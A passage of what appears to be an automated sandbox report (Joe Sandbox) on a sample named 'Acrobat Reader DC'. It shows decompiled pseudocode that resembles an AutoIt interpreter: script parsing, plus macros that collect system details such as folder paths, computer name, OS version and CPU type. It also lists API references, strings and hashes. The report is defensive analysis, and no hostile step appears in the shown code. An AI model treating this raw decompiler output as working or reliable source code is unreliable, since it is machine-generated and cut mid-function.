                                  									_v19 = 0;
                                  									break;
                                  								}
                                  								_t197 = E004111C1( &_a2200);
                                  								_t291 = _t288 + 4;
                                  								if(_t197 == 0) {
                                  									L28:
                                  									_v0 = 0;
                                  									_t198 = E004111C1( &_a2200);
                                  									_t288 = _t291 + 4;
                                  									if(_t198 > 2) {
                                  										_t280 = _t198;
                                  										_t210 = E00413225( *(_t288 + 0x8a4 + _t280 * 2) & 0x7f,  *(_t288 + 0x8a4 + _t280 * 2) & 0x7f);
                                  										_t288 = _t288 + 4;
                                  										if(_t210 != 0) {
                                  											__eflags =  *((short*)(_t288 + 0x8a6 + _t280 * 2)) - 0x5f;
                                  											if( *((short*)(_t288 + 0x8a6 + _t280 * 2)) == 0x5f) {
                                  												 *((short*)(_t288 + 0x8a6 + _t280 * 2)) = 0;
                                  												_v0 = 1;
                                  											}
                                  										}
                                  									}
                                  									if(_a2 == 1) {
                                  										_t237 = _a4;
                                  										E00434963(_a4,  &_a2200);
                                  									} else {
                                  										_t279 = _a4;
                                  										_t237 = _a4;
                                  										_t202 = E00403A20(_a4,  &_a2200, _t322,  &_a2200,  &_a96,  &_a4,  &_a24);
                                  										if(_t202 != 3) {
                                  											_t203 = _t202;
                                  											__eflags = _t203;
                                  											if(_t203 == 0) {
                                  												_a1 = 0;
                                  												L33:
                                  												if(_v0 == 1) {
                                  													_a2 = 1;
                                  												} else {
                                  													_a2 = 0;
                                  												}
                                  												if(_a1 != 1) {
                                  													break;
                                  												} else {
                                  													_t225 = _a3;
                                  													continue;
                                  												}
                                  											}
                                  											_t204 = _t203 - 2;
                                  											__eflags = _t204;
                                  											if(_t204 == 0) {
                                  												goto L32;
                                  											}
                                  											_t207 = _t204 - 2;
                                  											__eflags = _t207;
                                  											if(_t207 == 0) {
                                  												_a3 = _t207;
                                  											}
                                  											goto L33;
                                  										}
                                  										L32:
                                  										_t237 = _a4;
                                  										E00403A50( &_a2200, _a4, _t279, _a4, _a12);
                                  									}
                                  									goto L33;
                                  								}
                                  								_t66 = _t197 - 1; // -1
                                  								_t282 = _t66;
                                  								if(_t282 < 0) {
                                  									L27:
                                  									 *((short*)(_t291 + 0x8aa + _t282 * 2)) = 0;
                                  									goto L28;
                                  								}
                                  								while(1) {
                                  									_t270 =  *(_t291 + 0x8a8 + _t282 * 2) & 0x0000ffff;
                                  									_t211 = E0041324E( *(_t291 + 0x8a8 + _t282 * 2) & 0x0000ffff);
                                  									_t291 = _t291 + 4;
                                  									if(_t211 == 0) {
                                  										goto L27;
                                  									}
                                  									_t212 = E00413225(_t237, _t270);
                                  									_t291 = _t291 + 4;
                                  									if(_t212 != 0) {
                                  										_t282 = _t282 - 1;
                                  										__eflags = _t282;
                                  										if(_t282 >= 0) {
                                  											continue;
                                  										}
                                  									}
                                  									goto L27;
                                  								}
                                  								goto L27;
                                  							} else {
                                  								goto L20;
                                  							}
                                  							do {
                                  								L20:
                                  								_t237 =  *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2));
                                  								 *((short*)(_t288 + 0x8a8 + _t270 * 2)) =  *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2));
                                  								_t278 = _t278 + 1;
                                  								_t270 =  &(_t270[0]);
                                  							} while ( *((short*)(_t288 + 0x8a8 + _t278 * 2)) != 0);
                                  							goto L21;
                                  						}
                                  					}
                                  					_t226 = 0;
                                  					goto L41;
                                  				}
                                  			}







































                                  0x0040367d
                                  0x00403682
                                  0x00403688
                                  0x0040368a
                                  0x0040369c
                                  0x004036a1
                                  0x004036a6
                                  0x0040371c
                                  0x00403725
                                  0x004282df
                                  0x004282e2
                                  0x004282e2
                                  0x00403725
                                  0x004036a6
                                  0x004036ad
                                  0x004282ec
                                  0x004282f8
                                  0x004036b3
                                  0x004036b3
                                  0x004036cd
                                  0x004036cf
                                  0x004036d7
                                  0x00428302
                                  0x00428302
                                  0x00428305
                                  0x00428322
                                  0x004036f2
                                  0x004036f7
                                  0x0042832c
                                  0x004036fd
                                  0x004036fd
                                  0x004036fd
                                  0x00403707
                                  0x00000000
                                  0x0040370d
                                  0x0040370d
                                  0x00000000
                                  0x0040370d
                                  0x00403707
                                  0x00428307
                                  0x00428307
                                  0x0042830a
                                  0x00000000
                                  0x00000000
                                  0x00428310
                                  0x00428310
                                  0x00428313
                                  0x00428319
                                  0x00428319
                                  0x00000000
                                  0x00428313
                                  0x004036dd
                                  0x004036e0
                                  0x004036ed
                                  0x004036ed
                                  0x00000000
                                  0x004036ad
                                  0x0040362f
                                  0x0040362f
                                  0x00403634
                                  0x00403666
                                  0x00403668
                                  0x00000000
                                  0x00403668
                                  0x00403640
                                  0x00403640
                                  0x00403649
                                  0x0040364e
                                  0x00403653
                                  0x00000000
                                  0x00000000
                                  0x00403656
                                  0x0040365b
                                  0x00403660
                                  0x004282ca
                                  0x004282ca
                                  0x004282cb
                                  0x00000000
                                  0x00000000
                                  0x004282d1
                                  0x00000000
                                  0x00403660
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004035e0
                                  0x004035e0
                                  0x004035e0
                                  0x004035e8
                                  0x004035f0
                                  0x004035f1
                                  0x004035f2
                                  0x00000000
                                  0x004035e0
                                  0x0040357e
                                  0x0042835a
                                  0x00000000
                                  0x0042835a

                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                  • __wsplitpath.LIBCMT ref: 00403492
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcscpy.LIBCMT ref: 004034A7
                                  • _wcscat.LIBCMT ref: 004034BC
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                  • _wcscpy.LIBCMT ref: 004035A0
                                  • _wcslen.LIBCMT ref: 00403623
                                  • _wcslen.LIBCMT ref: 0040367D
                                  Strings
                                  • Error opening the file, xrefs: 00428231
                                  • _, xrefs: 0040371C
                                  • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                  • Unterminated string, xrefs: 00428348
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                  • API String ID: 3393021363-188983378
                                  • Opcode ID: 9c138f860f86a0d4610993aab54d097ae5008560e405b0aba632f65b2ab93e4d
                                  • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                  • Opcode Fuzzy Hash: 9c138f860f86a0d4610993aab54d097ae5008560e405b0aba632f65b2ab93e4d
                                  • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E004720DB(void* __eflags, void* __fp0, long _a4, struct HDC__* _a8, char _a12) {
                                  				signed int _v6;
                                  				struct _SYSTEMTIME* _v8;
                                  				struct HWND__* _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v28;
                                  				char _v36;
                                  				struct tagRECT _v52;
                                  				signed int _v56;
                                  				char _v68;
                                  				char _v100;
                                  				char _v626;
                                  				short _v628;
                                  				char _v644;
                                  				char _v660;
                                  				char _v676;
                                  				char _v684;
                                  				char _v700;
                                  				char _v708;
                                  				char _v716;
                                  				char _v732;
                                  				char _v740;
                                  				char _v748;
                                  				char _v756;
                                  				char _v772;
                                  				char _v780;
                                  				short _v800;
                                  				char _v1330;
                                  				char _v1332;
                                  				signed int __ebx;
                                  				struct HWND__* __edi;
                                  				signed int __esi;
                                  				void* _t195;
                                  				struct HDC__* _t215;
                                  				signed int _t229;
                                  				void* _t233;
                                  				void* _t235;
                                  				void* _t241;
                                  
                                  				_t241 = __fp0;
                                  				_t215 = _a8;
                                  				_v628 = 0;
                                  				E00412F40( &_v626, 0, 0x208);
                                  				_v1332 = 0;
                                  				E00412F40( &_v1330, 0, 0x208);
                                  				_t235 = _t233 + 0x18;
                                  				_t229 = 0;
                                  				_v8 = _a12;
                                  				while(1) {
                                  					_t195 = E0041313C( *((intOrPtr*)(0x491770 + _t229 * 4)), _v8);
                                  					_t235 = _t235 + 8;
                                  					if(_t195 == 0) {
                                  						break;
                                  					}
                                  					_t229 = _t229 + 1;
                                  					if(_t229 < 0x60) {
                                  						continue;
                                  					}
                                  					break;
                                  				}
                                  				_t239 = _t229 - 0x60;
                                  				if(_t229 != 0x60) {
                                  					__eflags = _t229 - 0x5f;
                                  					if(__eflags > 0) {
                                  						L144:
                                  						E00402250( &_a12);
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						switch( *((intOrPtr*)(_t229 * 4 +  &M00472DC7))) {
                                  							case 0:
                                  								__ecx =  *__esi;
                                  								__edx =  *( *__esi + 4);
                                  								__eax =  *( *__esi + 4) + __esi + 4;
                                  								__edi =  *(E00403CC0( *( *__esi + 4) + __esi + 4) + 0x14);
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = __edi;
                                  								goto L143;
                                  							case 1:
                                  								__eax =  *__esi;
                                  								__ecx =  *( *__esi + 4);
                                  								__eax = __ecx + __esi + 4;
                                  								E00403CC0(__ecx + __esi + 4) = __eax + 0x20;
                                  								__eax = E00408E80(__ebx, __ecx, __eax);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 2:
                                  								__edx =  &_v20;
                                  								GetLocalTime(__edx);
                                  								__eax = _v6 & 0x0000ffff;
                                  								_push(_v6 & 0x0000ffff);
                                  								_push(L"%.3d");
                                  								__ecx =  &_v628;
                                  								_push( &_v628);
                                  								goto L16;
                                  							case 3:
                                  								__edx =  &_v644;
                                  								 &_v684 = E00441E23( &_v644,  &_v684);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								__ecx =  &_v644;
                                  								__eax = E00402250( &_v644);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 4:
                                  								_t44 =  &_v772; // 0x48beb0
                                  								__ecx = _t44;
                                  								_t45 =  &_v756; // 0x48bec0
                                  								__eax = E00441E23(_t45, _t45);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								_t46 =  &_v772; // 0x48beb0
                                  								__ecx = _t46;
                                  								__eax = E00402250(_t46);
                                  								_t47 =  &_a12; // 0x48c1c0
                                  								__ecx = _t47;
                                  								E00402250(_t47) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 5:
                                  								_t48 =  &_v732; // 0x48bee0
                                  								__eax = _t48;
                                  								_t49 =  &_v708; // 0x48bef8
                                  								__ecx = _t49;
                                  								__eax = E00441E23(__edx, _t49);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								_t50 =  &_v732; // 0x48bee0
                                  								__ecx = _t50;
                                  								__eax = E00402250(_t50);
                                  								_t51 =  &_a12; // 0x48c1c8
                                  								__ecx = _t51;
                                  								E00402250(_t51) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 6:
                                  								_t52 =  &_v660; // 0x48bf30
                                  								__edx = _t52;
                                  								_t53 =  &_v716; // 0x48bef8
                                  								_t53 = E00441E23(_t52, _t53);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								_t54 =  &_v660; // 0x48bf30
                                  								__ecx = _t54;
                                  								__eax = E00402250(_t54);
                                  								_t55 =  &_a12; // 0x48c1d0
                                  								__ecx = _t55;
                                  								E00402250(_t55) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 7:
                                  								_t56 =  &_v676; // 0x485e8c
                                  								__ecx = _t56;
                                  								_t57 =  &_v780; // 0x485e24
                                  								__eax = E00441E23(_t57, _t57);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								_t58 =  &_v676; // 0x485e8c
                                  								__ecx = _t58;
                                  								__eax = E00402250(_t58);
                                  								_t59 =  &_a12; // 0x48613c
                                  								__ecx = _t59;
                                  								E00402250(_t59) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 8:
                                  								_t60 =  &_v700; // 0x48bf10
                                  								__eax = _t60;
                                  								_t61 =  &_v748; // 0x48bee0
                                  								__ecx = _t61;
                                  								__eax = E00441E23(__edx, _t61);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								_t62 =  &_v700; // 0x48bf10
                                  								__ecx = _t62;
                                  								__eax = E00402250(_t62);
                                  								_t63 =  &_a12; // 0x48c1d8
                                  								__ecx = _t63;
                                  								E00402250(_t63) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 9:
                                  								_t64 =  &_v740; // 0x48bef0
                                  								__edx = _t64;
                                  								__eax = E00441E23(__edx, __edx);
                                  								_push(__eax);
                                  								_push(L"%d");
                                  								_t65 =  &_v628; // 0x48bf60
                                  								__eax = _t65;
                                  								_push(_t65);
                                  								L16:
                                  								__eax = E0041329B(__edx);
                                  								goto L17;
                                  							case 0xa:
                                  								__ecx =  &_v68;
                                  								__eax = E00441E23( &_v28,  &_v28);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								__ecx =  &_v68;
                                  								__eax = E00402250( &_v68);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0xb:
                                  								_t70 =  &_v628; // 0x48bf68
                                  								__eax = _t70;
                                  								_push(_t70);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x26);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0xc:
                                  								_t71 =  &_v628; // 0x48bf68
                                  								__ecx = _t71;
                                  								_push(__ecx);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x2b);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0xd:
                                  								_t72 =  &_v628; // 0x48bf68
                                  								__edx = _t72;
                                  								_push(_t72);
                                  								_push(0);
                                  								_push(0);
                                  								_push(5);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0xe:
                                  								_t73 =  &_v628; // 0x48bf68
                                  								__eax = _t73;
                                  								_push(_t73);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x23);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0xf:
                                  								_t74 =  &_v628; // 0x48bf68
                                  								__ecx = _t74;
                                  								_push(__ecx);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x19);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x10:
                                  								_t75 =  &_v628; // 0x48bf68
                                  								__edx = _t75;
                                  								_push(_t75);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x2e);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x11:
                                  								_t76 =  &_v628; // 0x48bf68
                                  								__eax = _t76;
                                  								_push(_t76);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x1f);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x12:
                                  								_t77 =  &_v628; // 0x48bf68
                                  								__ecx = _t77;
                                  								_push(__ecx);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x17);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x13:
                                  								_t78 =  &_v628; // 0x48bf68
                                  								__edx = _t78;
                                  								_push(_t78);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x16);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x14:
                                  								__eax =  &_v628;
                                  								_push( &_v628);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x18);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x15:
                                  								__ecx =  &_v628;
                                  								_push(__ecx);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x1a);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x16:
                                  								__edx =  &_v628;
                                  								_push( &_v628);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x10);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x17:
                                  								__eax =  &_v628;
                                  								_push( &_v628);
                                  								_push(0);
                                  								_push(0);
                                  								_push(6);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x18:
                                  								__ecx =  &_v628;
                                  								_push(__ecx);
                                  								_push(0);
                                  								_push(0);
                                  								_push(2);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x19:
                                  								__edx =  &_v628;
                                  								_push( &_v628);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0xb);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x1a:
                                  								__eax =  &_v628;
                                  								_push( &_v628);
                                  								_push(0);
                                  								_push(0);
                                  								_push(7);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x1b:
                                  								__ecx =  &_a4;
                                  								__edx =  &_v628;
                                  								_a4 = 0x104;
                                  								__eax = GetComputerNameW( &_v628, __ecx);
                                  								goto L18;
                                  							case 0x1c:
                                  								__eax =  &_v628;
                                  								__eax = GetWindowsDirectoryW( &_v628, 0x104);
                                  								__eflags = __eax;
                                  								if(__eax == 0) {
                                  									goto L144;
                                  								} else {
                                  									goto L18;
                                  								}
                                  								goto L145;
                                  							case 0x1d:
                                  								__ecx =  *0x4a9604;
                                  								__eflags = __ecx[0x16];
                                  								_push(0x104);
                                  								__edx =  &_v628;
                                  								_push( &_v628);
                                  								if(__eflags == 0) {
                                  									__eax = GetSystemDirectoryW();
                                  								} else {
                                  									__eax = 0;
                                  									_v16 = 0;
                                  									_v8 = 0;
                                  									__eax =  &_v16;
                                  									E00430E0D(__eflags,  &_v16) = __eax->i();
                                  									__ecx =  &_v16;
                                  									__eax = E00430CCB(__ecx);
                                  								}
                                  								goto L18;
                                  							case 0x1e:
                                  								L141:
                                  								__esi = __ebx;
                                  								goto L142;
                                  							case 0x1f:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 6;
                                  								goto L143;
                                  							case 0x20:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 3;
                                  								goto L143;
                                  							case 0x21:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 9;
                                  								goto L143;
                                  							case 0x22:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 5;
                                  								goto L143;
                                  							case 0x23:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 0xa;
                                  								goto L143;
                                  							case 0x24:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 0x40;
                                  								goto L143;
                                  							case 0x25:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 0x41;
                                  								goto L143;
                                  							case 0x26:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 2;
                                  								goto L143;
                                  							case 0x27:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 7;
                                  								goto L143;
                                  							case 0x28:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 8;
                                  								goto L143;
                                  							case 0x29:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 4;
                                  								goto L143;
                                  							case 0x2a:
                                  								L128:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 1;
                                  								goto L143;
                                  							case 0x2b:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 0x42;
                                  								goto L143;
                                  							case 0x2c:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 0x43;
                                  								goto L143;
                                  							case 0x2d:
                                  								__eflags =  *0x4974ea - 1;
                                  								goto L60;
                                  							case 0x2e:
                                  								__eflags =  *0x4a8719 - 1;
                                  								L60:
                                  								__esi = __ebx;
                                  								if(__eflags != 0) {
                                  									L142:
                                  									__eax = E00408F40(__edi, __esi);
                                  									 *__ebx = 0;
                                  								} else {
                                  									__eax = E00408F40(__edi, __esi);
                                  									 *__ebx = 1;
                                  								}
                                  								goto L143;
                                  							case 0x2f:
                                  								__eax =  *(__esi + 0xc8);
                                  								goto L19;
                                  							case 0x30:
                                  								__eax =  *(__esi + 0xb8);
                                  								goto L19;
                                  							case 0x31:
                                  								__eax =  *(__esi + 0xd8);
                                  								goto L19;
                                  							case 0x32:
                                  								__eax =  *(__esi + 0xf4);
                                  								__eax = E004348AA( *(__esi + 0xf4));
                                  								__esi = __ebx;
                                  								__edi = __eax;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = __edi;
                                  								goto L143;
                                  							case 0x33:
                                  								__ecx =  &_v628;
                                  								__eax = GetCurrentDirectoryW(0x104, __ecx);
                                  								goto L18;
                                  							case 0x34:
                                  								__eax = L"WIN32_NT";
                                  								goto L19;
                                  							case 0x35:
                                  								__eax =  *0x4a9604;
                                  								__eflags =  *((char*)(__eax + 0x2a)) - 1;
                                  								if( *((char*)(__eax + 0x2a)) != 1) {
                                  									__eflags =  *((char*)(__eax + 0x28)) - 1;
                                  									if( *((char*)(__eax + 0x28)) != 1) {
                                  										__eflags =  *((char*)(__eax + 0x26)) - 1;
                                  										if( *((char*)(__eax + 0x26)) != 1) {
                                  											__eflags =  *((char*)(__eax + 0x24)) - 1;
                                  											if( *((char*)(__eax + 0x24)) != 1) {
                                  												__eflags =  *((char*)(__eax + 0x22)) - 1;
                                  												if( *((char*)(__eax + 0x22)) != 1) {
                                  													__eflags =  *((char*)(__eax + 0x20)) - 1;
                                  													if( *((char*)(__eax + 0x20)) != 1) {
                                  														__eflags =  *((char*)(__eax + 0x1e)) - 1;
                                  														if( *((char*)(__eax + 0x1e)) != 1) {
                                  															__eflags =  *((char*)(__eax + 0x1c)) - 1;
                                  															if( *((char*)(__eax + 0x1c)) != 1) {
                                  																goto L99;
                                  															} else {
                                  																__eax = L"WIN_2000";
                                  															}
                                  														} else {
                                  															__eflags =  *((char*)(__eax + 0x30));
                                  															__eax = L"WIN_XPe";
                                  															if(__eflags == 0) {
                                  																__eax = L"WIN_XP";
                                  															}
                                  														}
                                  													} else {
                                  														__eax = L"WIN_2003";
                                  													}
                                  												} else {
                                  													__eax = L"WIN_VISTA";
                                  												}
                                  											} else {
                                  												__eax = L"WIN_2008";
                                  											}
                                  										} else {
                                  											__eax = L"WIN_7";
                                  										}
                                  									} else {
                                  										__eax = L"WIN_2008R2";
                                  									}
                                  								} else {
                                  									__eax = L"WIN_8";
                                  								}
                                  								goto L19;
                                  							case 0x36:
                                  								__eax =  *0x4a9604;
                                  								__edi =  *0x4a9604->wHour;
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = __edi;
                                  								goto L143;
                                  							case 0x37:
                                  								__edi =  *0x4a9604;
                                  								__edi =  &( *0x4a9604->wSecond);
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx,  &( *0x4a9604->wSecond), __ebx);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x38:
                                  								__esi =  &_v628;
                                  								__edx = L"SYSTEM\\CurrentControlSet\\Control\\Nls\\Language";
                                  								__eax = E0040F250(L"SYSTEM\\CurrentControlSet\\Control\\Nls\\Language",  &_v628, 0x80000002, L"InstallLanguage", 0x104);
                                  								L17:
                                  								__esp = __esp + 0xc;
                                  								goto L18;
                                  							case 0x39:
                                  								__edx =  *0x4a9604;
                                  								__eax =  *( *0x4a9604 + 0x2e) & 0x0000ffff;
                                  								__eflags = __eax;
                                  								if(__eax == 0) {
                                  									__eax = L"X86";
                                  								} else {
                                  									__eflags = __eax - 6;
                                  									if(__eax == 6) {
                                  										__eax = L"IA64";
                                  									} else {
                                  										__eflags = __eax - 9;
                                  										if(__eax != 9) {
                                  											L99:
                                  											__eax = L"UNKNOWN";
                                  										} else {
                                  											__eax = L"X64";
                                  										}
                                  									}
                                  								}
                                  								goto L19;
                                  							case 0x3a:
                                  								__ecx = 0;
                                  								__eax = 0x80000001;
                                  								asm("cpuid");
                                  								__esi =  &_v68;
                                  								 *__esi = 0x80000001;
                                  								 *(__esi + 4) = __ebx;
                                  								 *((intOrPtr*)(__esi + 8)) = 0;
                                  								 *(__esi + 0xc) = __edx;
                                  								__eflags = _v56 & 0x20000000;
                                  								__eax = L"X64";
                                  								if((_v56 & 0x20000000) == 0) {
                                  									__eax = L"X86";
                                  								}
                                  								__ebx = _a8;
                                  								goto L19;
                                  							case 0x3b:
                                  								__edx =  &_v800;
                                  								__eax = GetKeyboardLayoutNameW( &_v800);
                                  								__eax =  &_v800;
                                  								goto L19;
                                  							case 0x3c:
                                  								 &_v1332 = E00411567( &_v1332, L"3, 3, 8, 1");
                                  								__ecx =  &_v1332;
                                  								__esi = 0;
                                  								__edi = 0;
                                  								__eax = E004111C1( &_v1332);
                                  								__eflags = __eax;
                                  								if(__eax > 0) {
                                  									do {
                                  										__eax =  *(__ebp + __edi * 2 - 0x530) & 0x0000ffff;
                                  										__eflags = __eax - 0x20;
                                  										if(__eax != 0x20) {
                                  											__eflags = __eax - 0x2c;
                                  											if(__eax != 0x2c) {
                                  												 *((short*)(__ebp + __esi * 2 - 0x530)) = __ax;
                                  											} else {
                                  												__edx = 0x2e;
                                  												 *((short*)(__ebp + __esi * 2 - 0x530)) = __dx;
                                  											}
                                  											__esi = __esi + 1;
                                  											__eflags = __esi;
                                  										}
                                  										__eax =  &_v1332;
                                  										__edi =  &(__edi->i);
                                  										__eax = E004111C1( &_v1332);
                                  										__eflags = __edi - __eax;
                                  									} while (__edi < __eax);
                                  								}
                                  								__ecx = 0;
                                  								 *((short*)(__ebp + __esi * 2 - 0x530)) = __cx;
                                  								__eax =  &_v1332;
                                  								goto L19;
                                  							case 0x3d:
                                  								__edx =  &_v628;
                                  								__eax = GetModuleFileNameW(0,  &_v628, 0x104);
                                  								goto L18;
                                  							case 0x3e:
                                  								 &_v100 = E00433493(1,  &_v100);
                                  								__eax =  &_v100;
                                  								goto L19;
                                  							case 0x3f:
                                  								__ecx =  &_v100;
                                  								__eax = E00433493(2,  &_v100);
                                  								__eax =  &_v100;
                                  								goto L19;
                                  							case 0x40:
                                  								__edx =  &_v100;
                                  								__eax = E00433493(3,  &_v100);
                                  								__eax =  &_v100;
                                  								goto L19;
                                  							case 0x41:
                                  								 &_v100 = E00433493(4,  &_v100);
